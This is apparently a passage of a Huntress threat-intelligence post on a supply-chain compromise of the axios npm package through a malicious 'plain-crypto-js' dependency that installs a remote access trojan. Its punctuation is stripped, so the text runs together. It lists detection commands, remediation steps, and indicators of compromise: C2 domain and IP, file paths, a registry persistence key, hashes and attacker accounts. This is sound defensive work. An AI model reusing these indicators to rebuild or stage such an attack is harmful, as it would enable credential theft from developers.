dependency even within a Wordpress module nested at CUsersREDACTEDAppDataRoamingnpmnodemoduleswordpressscriptsnodemodulesplaincryptojsconfirming the supply chain propagated through any package that transitively depended on axiosppppAt 1056 PM Max Rogers shared the Feross Socket Security tweet in the SOC channel the first public alarm about the axios compromise The Huntress SOC had already been investigating for over an hourppSoon we understood the full scale in the moment 135 results across all operating systems contacting sfrclakcomppppOn every compromised host the RAT performed immediate system reconnaissance enumerating user directories filesystem drive roots and running processes and transmitted this data to the C2 The RAT maintained a 60second beacon loop ready to accept further commands including arbitrary script execution and inmemory binary injection For Windows hosts the RAT established persistence that would survive reboots and redownload the payload on every user loginppDeveloper workstations and CICD runners are highvalue targets These environments commonly hold npm tokens SSH keys cloud credentials API keys env files and other secrets Any system that executed the malicious payload should be treated as a full credentialtheft scenarioppppMany of these mitigations are credited to StepSecuritys great writeup and effort in sounding the alarm about this widespread supplychain attackpp1 Check your lockfiles packagelockjson yarnlock pnpmlockyaml forppemail protectedppemail protectedppAny version of plaincryptojspppp2 Check for the malicious dependency directoryppls nodemodulesplaincryptojs 2devnull echo POTENTIALLY AFFECTEDppThe directory presence is sufficient evidence even if packagejson inside appears clean due to the antiforensics swappppp3 Check endpoints for platformspecific artifactsppmacOsppls la LibraryCachescomappleactmondppWindows cmdexeppdir PROGRAMDATAwtexeppdir PROGRAMDATAsystembatppreg query HKCUSoftwareMicrosoftWindowsCurrentVersionRun v MicrosoftUpdateppLinuxppls la tmpldpypp4 Check networkDNS logs for connections to sfrclakcom or 1421120673 on port 8000pppp Pin to safe versions immediatelypp Add overrides to prevent transitive resolutionpppp overrides axios 1140 pp resolutions axios 1140 pppp Remove the malicious dependency
pprm rf nodemodulesplaincryptojsppnpm install ignorescriptspp
pp If RAT artifacts are found on an endpoint Do not attempt to clean in place Rebuild from a knowngood imagepp
Rotate all credentials accessible from affected systems npm tokens AWS keys SSH keys CICD secrets env values cloud credentials OAuth tokens API keys
pp
Block the C2 at the network perimeter
ppDomain sfrclakcomppIP 1421120673ppPort 8000pp
Clean npm cache npm cache clean force
ppppAlways commit lockfiles and use npm ci instead of npm install in CICDppSet npm config set minreleaseage 3 to enforce a 4872 hour quarantine on new package versionsppUse ignorescripts as a standing CICD policy where possibleppImplement OIDC Trusted Publishing for npm publishes and remove longlived npm tokens even when OIDC is configured a coexisting token takes precedenceppDeploy software composition analysis SCA tooling with realtime malware detectionppppHuntress has deployed detections covering all platform variants of this attack includingppNetwork C2 activity to sfrclakcom8000 and the RAT callback patternsppExecution of the plaincryptojs postinstall dropper and the obfuscated setupjs behaviorppPlatformspecific artifactsppmacOS LibraryCachescomappleactmondppWindows PROGRAMDATAwtexe shortlived temp scripts and the MicrosoftUpdate registry persistenceppLinux tmpldpy and related Python execution chainsppProcess trees consistent with node cmdcscript wtexe on Windows and osascript curl comappleactmond on macOSppWe are actively hunting across Huntressmonitored endpoints and working directly with affected partners on hostlevel investigation and remediationppppPackageppVersionppSHA1ppaxiospp1141 MALICIOUSpp2553649f2322049666871cea80a5d0d6adc700cappaxiospp0304 MALICIOUSppd6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71ppplaincryptojspp421 MALICIOUSpp07d889e2dadce6f3910dcbc253317d28ca61c766ppPlatformppSHA256ppDescriptionppWindows Stage 1ppf7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cdppPowerShell download cradleppWindows Stage 2pp617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101ppPowerShell RATppmacOSpp92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645appMachO Universal Binary x8664 ARM64ppLinuxppfcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cfppPython RAT scriptppIndicatorppTypeppDescriptionppsfrclakcomppDomainppC2 serverpp1421120673ppIP AddressppC2 IPpphxxpsfrclakcom80006202033ppURLppC2 endpointpppackagesnpmorgproduct0ppPOST BodyppmacOS C2 beaconpppackagesnpmorgproduct1ppPOST BodyppWindows C2 beaconpppackagesnpmorgproduct2ppPOST BodyppLinux C2 beaconppmozilla40 compatible msie 80 windows nt 51 trident40ppUserAgentppRAT beacon all platformsppPlatformppPathppDescriptionppmacOSppLibraryCachescomappleactmondppStage2 MachO RAT binaryppWindowsppPROGRAMDATAwtexeppRenamed powershellexe persistentppWindowsppPROGRAMDATAsystembatppHidden persistence batch fileppWindowsppTEMP6202033vbsppVBScript launcher selfdeletesppWindowsppTEMP6202033ps1ppPowerShell payload selfdeletesppLinuxpptmpldpyppPython RAT scriptppAllppnodemodulesplaincryptojsppMalicious dependency directoryppKeyppValue NameppDatappHKCUSoftwareMicrosoftWindowsCurrentVersionRunppMicrosoftUpdateppPROGRAMDATAsystembatppIndicatorppDescriptionppifstapprotonmeppEmail set on compromised jasonsaayman npm accountppnrwiseprotonmeppAttackercreated npm account that published plaincryptojsppppSocket Security axios Compromised on npmppStepSecurity axios Compromised on npm Malicious Versions Drop Remote Access TrojanppAikido axios npm Compromised Maintainer Hijacked RAT DeployedppJoe Desimone Elastic Security Technical Analysis GistppGitHub Issue 10604 axios Maintainer ResponseppFeross Aboukhadijeh Socket Initial Public Alertppaxios Deprecation Workflow for Compromised Versionsppnpm Package plaincryptojs v421 setupjs source ppppppppProtecting 242k customers like you with enterprisegrade protectionppGet insider access to Huntress tradecraft killer events and the freshest blog updatesp
